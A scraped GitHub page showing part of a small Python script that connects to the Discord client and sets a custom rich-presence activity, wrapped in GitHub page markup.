class=pl-s>&#39;small_text&#39;</span>: <span class=pl-s>&#39;Small image text&#39;</span></td> </tr> <tr> <td id="L16" class="blob-num js-line-number" data-line-number="16"></td> <td id="LC16" class="blob-code blob-code-inner js-file-line"> },</td> </tr> <tr> <td id="L17" class="blob-num js-line-number" data-line-number="17"></td> <td id="LC17" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;party&#39;</span>: {</td> </tr> <tr> <td id="L18" class="blob-num js-line-number" data-line-number="18"></td> <td id="LC18" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;size&#39;</span>: [<span class=pl-c1>1</span>, <span class=pl-c1>5</span>]</td> </tr> <tr> <td id="L19" class="blob-num js-line-number" data-line-number="19"></td> <td id="LC19" class="blob-code blob-code-inner js-file-line"> }</td> </tr> <tr> <td id="L20" class="blob-num js-line-number" data-line-number="20"></td> <td id="LC20" class="blob-code blob-code-inner js-file-line">}</td> </tr> <tr> <td id="L21" class="blob-num js-line-number" data-line-number="21"></td> <td id="LC21" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L22" class="blob-num js-line-number" data-line-number="22"></td> <td id="LC22" class="blob-code blob-code-inner js-file-line"><span class=pl-k>def</span> <span class=pl-en>main</span>():</td> </tr> <tr> <td id="L23" class="blob-num js-line-number" data-line-number="23"></td> <td id="LC23" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span> <span class=pl-c1>=</span> <span class=pl-s1>ipc</span>.<span class=pl-v>DiscordIPC</span>(<span class=pl-s1>config</span>[<span class=pl-s>&#39;CLIENT&#39;</span>][<span class=pl-s>&#39;client_id&#39;</span>])</td> </tr> <tr> <td id="L24" class="blob-num js-line-number" data-line-number="24"></td> <td id="LC24" class="blob-code blob-code-inner js-file-line"> <span class=pl-c># Connect to Discord Client</span></td> </tr> <tr> <td id="L25" class="blob-num js-line-number" data-line-number="25"></td> <td id="LC25" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span>.<span class=pl-en>connect</span>()</td> </tr> <tr> <td id="L26" class="blob-num js-line-number" data-line-number="26"></td> <td id="LC26" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L27" class="blob-num js-line-number" data-line-number="27"></td> <td id="LC27" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>print</span>(<span class=pl-s>&#39;<span class=pl-cce>\n</span>Starting Custom Activity...<span class=pl-cce>\n</span>&#39;</span>)</td> </tr> <tr> <td id="L28" class="blob-num js-line-number" data-line-number="28"></td> <td id="LC28" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>time</span>.<span class=pl-en>sleep</span>(<span class=pl-c1>5</span>)</td> </tr> <tr> <td id="L29" class="blob-num js-line-number" data-line-number="29"></td> <td id="LC29" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L30" class="blob-num js-line-number" data-line-number="30"></td> <td id="LC30" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>try</span>:</td> </tr> <tr> <td id="L31" class="blob-num js-line-number" data-line-number="31"></td> <td id="LC31" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span>.<span class=pl-en>update_activity</span>(<span class=pl-en>set_activity</span>()) <span class=pl-c># Update Activity</span></td> </tr> <tr> <td id="L32" class="blob-num js-line-number" data-line-number="32"></td> <td id="LC32" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>while</span> <span class=pl-c1>True</span>:</td> </tr> <tr> <td id="L33" class="blob-num js-line-number" data-line-number="33"></td> <td id="LC33" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>input</span>(<span class=pl-s>&#39;<span class=pl-cce>\n</span>Connected! &#39;</span>)</td> </tr> <tr> <td id="L34" class="blob-num js-line-number" data-line-number="34"></td> <td id="LC34" class="blob-code blob-code-inner js-file-line"> <span class=pl-c># Do nothing </span></td> </tr> <tr> <td id="L35" class="blob-num js-line-number" data-line-number="35"></td> <td id="LC35" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L36" class="blob-num js-line-number" data-line-number="36"></td> <td id="LC36" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>except</span> <span class=pl-v>KeyboardInterrupt</span>:</td> </tr> <tr> <td id="L37" class="blob-num js-line-number" data-line-number="37"></td> <td id="LC37" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>print</span>(<span class=pl-s>&#39;Disconnecting...<span class=pl-cce>\n</span>&#39;</span>)</td> </tr> <tr> <td id="L38" class="blob-num js-line-number" data-line-number="38"></td> <td id="LC38" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span>.<span class=pl-en>disconnect</span>()</td> </tr> <tr> <td id="L39" class="blob-num js-line-number" data-line-number="39"></td> <td id="LC39" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L40" class="blob-num js-line-number" data-line-number="40"></td> <td id="LC40" class="blob-code blob-code-inner js-file-line"><span class=pl-k>def</span> <span class=pl-en>set_activity</span>():</td> </tr> <tr> <td id="L41" class="blob-num js-line-number" data-line-number="41"></td> <td id="LC41" class="blob-code blob-code-inner js-file-line"> <span class=pl-c># Set acitivty for the player.</span></td> </tr> <tr> <td id="L42" class="blob-num js-line-number" data-line-number="42"></td> <td id="LC42" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>activity</span> <span class=pl-c1>=</span> <span class=pl-s1>base_activity</span></td> </tr> <tr> <td id="L43" class="blob-num js-line-number" data-line-number="43"></td> <td id="LC43" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>return</span> <span class=pl-s1>activity</span></td> </tr> <tr> <td id="L44" class="blob-num js-line-number" data-line-number="44"></td> <td id="LC44" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L45" class="blob-num js-line-number" data-line-number="45"></td> <td id="LC45" class="blob-code blob-code-inner js-file-line"><span class=pl-k>if</span> <span class=pl-s1>__name__</span> <span class=pl-c1>==</span> <span class=pl-s>&#39;__main__&#39;</span>:</td> </tr> <tr> <td id="L46" class="blob-num js-line-number" data-line-number="46"></td> <td id="LC46" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>main</span>()</td> </tr> </table> <details class="details-reset details-overlay BlobToolbar position-absolute js-file-line-actions dropdown d-none" aria-hidden="true"> <summary class="btn-octicon ml-0 px-2 p-0 color-bg-primary border color-border-tertiary rounded-1" aria-label="Inline file action toolbar"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> </summary> <details-menu> <ul class="BlobToolbar-dropdown dropdown-menu dropdown-menu-se ml-2 mt-2" style="width:185px" > <li> <clipboard-copy role="menuitem" class="dropdown-item" id="js-copy-lines" style="cursor:pointer;" aria-label="Copy lines"> Copy lines </clipboard-copy> </li> <li> <clipboard-copy role="menuitem" class="dropdown-item" id="js-copy-permalink" style="cursor:pointer;" aria-label="Copy permalink"> Copy permalink </clipboard-copy> </li> <li><a class="dropdown-item js-update-url-with-hash" id="js-view-git-blame" role="menuitem" href="/agambajwa/discord-custom-activity/blame/9a6488f083af4b9c41113cffbb0b8e4356985c11/app.py">View git blame</a></li> <li><a class="dropdown-item" id="js-new-issue" role="menuitem" href="/agambajwa/discord-custom-activity/issues/new">Reference in new issue</a></li> </ul> </details-menu> </details> </div> </div> <details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump" aria-label="Jump to line"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="js-jump-to-line-form Box-body d-flex" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line&hellip;" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go </button> </form> </details-dialog> </details> <div class="Popover anim-scale-in js-tagsearch-popover" hidden data-tagsearch-url="/agambajwa/discord-custom-activity/find-definition" data-tagsearch-ref="master" data-tagsearch-path="app.py" data-tagsearch-lang="Python" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.click_on_symbol&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;click_on_symbol&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0a8f6a41e955842b0be9a33175d7ebbdd2cb6543f0698dc9866704903cd61c36"> <div class="Popover-message Popover-message--large Popover-message--top-left TagsearchPopover mt-1 mb-4 mx-auto Box color-shadow-large"> <div class="TagsearchPopover-content js-tagsearch-popover-content overflow-auto" style="will-change:transform;"> </div> </div> </div> </div> </div> </div> </main> </div> </div> <div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-text-secondary border-top color-border-secondary "> <ul class="list-style-none d-flex flex-wrap col-12 col-lg-5 flex-justify-center flex-lg-justify-between mb-2 mb-lg-0"> <li class="mr-3 mr-lg-0">&copy; 2021 GitHub, Inc.</li> <li class="mr-3 mr-lg-0"><a href="https://docs.github.com/en/github/site-policy/github-terms-of-service" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to terms&quot;,&quot;label&quot;:&quot;text:terms&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="cad6f39ced678e86d7a5e96c023c0fa2c5891ec5b3616a49afcdaa21ee3d0c12">Terms</a></li> <li class="mr-3 mr-lg-0"><a href="https://docs.github.com/en/github/site-policy/github-privacy-statement" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to privacy&quot;,&quot;label&quot;:&quot;text:privacy&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="263230e8c537a87a5634a289f54b032bfa6685a1a11a704bbf33de36a0553bab">Privacy</a></li> <li class="mr-3 mr-lg-0"><a data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to security&quot;,&quot;label&quot;:&quot;text:security&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="46892c668135bbb345714e41d8dd65b412a7bc1ac126e1104a21457b01280b3b" href="https://github.com/security">Security</a></li> <li class="mr-3 mr-lg-0"><a href="https://www.githubstatus.com/" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to status&quot;,&quot;label&quot;:&quot;text:status&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="850b1e9b63cf1369fce12635727170f159af2c820c10b435a1369da13f6a3b37">Status</a></li> <li><a data-ga-click="Footer, go to help, text:Docs" href="https://docs.github.com">Docs</a></li> </ul> <a aria-label="Homepage" title="GitHub" class="footer-octicon d-none d-lg-block mx-lg-4" href="https://github.com"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path> </svg> </a> <ul class="list-style-none d-flex flex-wrap col-12 col-lg-5 flex-justify-center flex-lg-justify-between mb-2 mb-lg-0"> <li class="mr-3 mr-lg-0"><a href="https://support.github.com?tags=dotcom-footer" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to contact&quot;,&quot;label&quot;:&quot;text:contact&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="ac4567556b973a5bf5d3c61161c07b927fab9772ddfb7e27055d611413f2acb4">Contact GitHub</a></li> <li class="mr-3 mr-lg-0"><a href="https://github.com/pricing" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Pricing&quot;,&quot;label&quot;:&quot;text:Pricing&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="894887d6dd70a306a70bc2b360c5fc5e23117412d10a4253ebae837147aeab59">Pricing</a></li> <li class="mr-3 mr-lg-0"><a href="https://docs.github.com" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to api&quot;,&quot;label&quot;:&quot;text:api&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="78682afcd93486f1045fa60a8b86e5c164e42aa8441a136e07d508ea87437b6a">API</a></li> <li class="mr-3 mr-lg-0"><a href="https://services.github.com" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to training&quot;,&quot;label&quot;:&quot;text:training&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="7760f130353590dca4b2a6f009556a55c9558bb6cd58a07f3b606904080437a1">Training</a></li> <li class="mr-3 mr-lg-0"><a href="https://github.blog" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to blog&quot;,&quot;label&quot;:&quot;text:blog&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="bcabd5b32e60440ed8e25c81ce8fded52be950ccd0c53391aac6071ecf738b7c">Blog</a></li> <li><a data-ga-click="Footer, go to about, text:about" href="https://github.com/about">About</a></li> </ul> </div> <div class="d-flex flex-justify-center pb-6"> <span class="f6 color-text-tertiary"></span> </div> </div> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> <span class="js-stale-session-flash-signed-in" hidden>You signed in with another tab or window. <a href="">Reload</a> to refresh your session.</span> <span class="js-stale-session-flash-signed-out" hidden>You signed out in another tab or window. <a href="">Reload</a> to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-text-primary hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details> </template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div> </div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path> </svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </clipboard-copy> </div> </template> <style> .user-mention[href$="/Bomzz06"] { color: var(--color-user-mention-fg); background-color: var(--color-user-mention-bg); border-radius: 2px; margin-left: -2px; margin-right: -2px; padding: 0 2px; } </style> </body> </html>
85.574602
16,258
0.683024
<!DOCTYPE html> <html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" integrity="sha512-d4XC7S3D2O/G0TvZjbbtWpDgCLyqvsXCX4K0DUJVfSwpV8ySOlchU43C/9mcyyHtCnczq4eoCl/e3fzC9uXxGA==" rel="stylesheet" href="https://github.githubassets.com/assets/light-7785c2ed2dc3d8efc6d13bd98db6ed5a.css" /><link crossorigin="anonymous" media="all" integrity="sha512-uEgC6AoKK1gK/XX3HlE4+2pdmfa3CUGgk9GV+7h+h0dtALsvueFLg+18JnwLD1axmkp744IzWjFcfHZTxmQyMQ==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-b84802e80a0a2b580afd75f71e5138fb.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-KQFKp2zcS4QM9du72skcYxPfuDslYljsOd9hsZFHSQl7WnkzjR0KkkuMbY7KFRWTerb8KbAYy11eD2ZoFgVyJg==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-29014aa76cdc4b840cf5dbbbdac91c63.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-Bldh8KfOmuQXEarLeCx5IxrQms1DznU4qGbQ6oCrAVNdd4jea40lyBHdddi7o1P4dhler91XHyO9+iBe7m6LzQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-065761f0a7ce9ae41711aacb782c7923.css" /><link data-color-theme="dark_protanopia" crossorigin="anonymous" media="all" integrity="sha512-ZTzLkJDxM5xDVGmjIyBfQBPzZ+qCtysiTQmLxFsZvozwCNcG4TgwuGWvSbKXxIGfD7rWNUt9kSyUyLxK1kMqhg==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_protanopia-653ccb9090f1339c435469a323205f40.css" /><link data-color-theme="light_protanopia" crossorigin="anonymous" media="all" integrity="sha512-S9e8SuxweN/gYIfZR+mVTRvfJGkdNlTmZzokT1GZ9KoGEcUjgtWlvihTLVoG3E9gssDhT62eoq6UEeOFjFuvFA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_protanopia-4bd7bc4aec7078dfe06087d947e9954d.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-+nVL2XvNtwumIdq12YtvhclBiE72DgFQr/ItWzUHymt6x2tCbYBg0DaLOy39bB+N4wmwNqQene1NORzhgfi/wQ==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-fa754bd97bcdb70ba621dab5d98b6f85.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-JhKolDx/FhHovKZsCFmQ2LKJwlyGRltUUDphBvVeSkv0Kl1vV4DpSpGXILf+CtiHubmHnqCOaBYpKb/rDjdAhQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-2612a8943c7f1611e8bca66c085990d8.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-/VP86KJoXAL8SaRo4I/QwqdgNg6xpeeb3JQ3gBKRLW76BBnBz3KCWJIKybR8px9wNNB6ixlzxDPAjkOSmRHODA==" rel="stylesheet" href="https://github.githubassets.com/assets/github-fd53fce8a2685c02fc49a468e08fd0c2.css" /> <script crossorigin="anonymous" defer="defer" integrity="sha512-bd5GjqJFbZLxlG4FXlu80JVzUSEHzxtnyyS98c3BaPbl32yravYkO9dNLUeI5QOm1XU7zIzJ0J5HOEQSfkgJOA==" type="application/javascript" src="https://github.githubassets.com/assets/environment-6dde468e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-c7dOB6hGd6OdYvUCrqXG0876tW5VQnJrRaBTz6kBjLZcGw2tKiXHfzDEiX5WEo1dseR2ilkdJPiZe1u0FrVhkg==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-73b74e07.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HKLxo1SCuvyND9pKagScspQtPtfYM442e7MMfig1ctv3M4xldrFt9nTLKE+KSshAfgn9839j9+BZPEeeUjJjKQ==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-1ca2f1a3.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EaSGeSQFfxLpe/avYyWp+85njCuoiL1FSklaKpZW18T+zwAl6eUjL/gMoISAY62x7+aNOtNG9V7awsMzgkgiJw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-11a48679.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Fv0IGb7X6YOQOp7bIjfuvISOJJCEsBWtmrn3neVFkckbHHt4pT0+T0nDl2mwVb1RCWVvS1DcZstOPl+SRFb0oA==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-16fd0819.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5tWKSr7mhAzSh4Sx5YRFgKftdGxKwHKnOGYw5DlxjHhkQVURYFU3Bk5IMOGMKuAiJTlC3OXYM3xzGcyjzuEFQQ==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-e6d58a4a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-KT8PJraOSW8f9HMDRcjmyilvPC/PVT3Pd9NpBA036w4RRzXaJGd/cSB8JxswenJDhSAPuydYcePTx8wWv/5CQw==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-293f0f26.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ol5y71RI6PxIzSuxVDnwevlSWZzk4bNc3O/EjhN5zfx6VPqcyDOAiN9CoTydwOZwe2K3Jmu+85/EV19h4A13Uw==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-a25e72ef.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-DbpM4Xk+KtL8iCOI+ZACZGMdHN+r6aXCD2Wibv0FOD6mvDnGinYFYfj0BcPOrN5Ku2lJuhXylCh2wNDCLPBBeQ==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-0dba4ce1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xrMxZfj62OcLN3FgzDtzy+P688RoxGL3nmdd2r4qJEjQZq5ZkqBwD6WiRoV4Mhnds8Y7JQebMbRCTITdFlZytg==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-c6b33165.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vpt2Tdt20tOKRtrRWtOVaRi2wBoAaflNGUR6xuQgU/0Ywfxvbazq0C2hhKwuiC8b6A813gXGm+8fj0NCEosbYQ==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-be9b764d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-arflMFcVzVAYaP2n7m7gklPChWsVsCDtRPav2Cb6bqLeJf8pgbojWJ3EseKXILCIqfxl/v6arBduZ9SLmpMEZw==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-6ab7e530.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6j/oSF+kbW+yetNPvI684VzAu9pzug6Vj2h+3u1LdCuRhR4jnuiHZfeQKls3nxcT/S3H+oIt7FtigE/aeoj+gg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-ea3fe848.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VSSd+Yzi2iMS+pibY6hD/WdypxAEdob5F2RMKxuKcAHS2EpFYJPeTXoVxt0NXg03tfj2dka2mEtHS+vjpYSaDw==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-55249df9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ErqZFlIt7zIbLoZHvwfq9Zjo5zo+Y1A410nePDGvK+WVTVP10iNTfoqdOOSZNSy1gtLKIWDIIiOV30lr6zUJCA==" type="application/javascript" 